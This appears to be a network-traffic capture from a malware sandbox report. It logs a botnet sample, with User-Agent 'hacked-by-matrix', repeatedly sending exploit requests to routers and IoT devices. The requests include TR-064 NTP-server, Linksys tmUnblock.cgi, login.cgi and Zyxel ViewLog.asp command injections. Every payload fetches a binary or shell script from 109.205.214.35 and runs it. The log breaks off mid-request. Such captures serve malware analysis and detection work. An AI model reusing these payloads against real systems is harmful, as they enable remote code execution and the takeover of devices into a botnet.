                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.1358348179.53.167.2557547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.347352982 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.501292944 CET88INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.134845831.136.205.2257547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.372338057 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:33.388282061 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:39.534558058 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:51.564382076 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:16.401530027 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.133514647.40.96.2417547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.399491072 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.134528078.185.167.647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.423506021 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.651942015 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:22:30 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.1358398179.53.167.2557547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.501780033 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.663294077 CET88INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.134850831.136.205.2257547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.555103064 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:31.117728949 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:32.237299919 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:34.669470072 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:39.279313087 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:48.236254930 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:06.156665087 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:43.024239063 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.133519847.40.96.2417547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.602832079 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.1335420172.65.214.23655555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.667723894 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.1350008212.93.101.678080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:31.049572945 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:31.661360979 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:32.908505917 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:35.441473961 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:40.563312054 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:50.540302038 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:10.257527113 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:51.212244034 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.1354690178.33.160.18280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:31.113622904 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:47.472245932 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:08.208246946 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:47.120234966 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
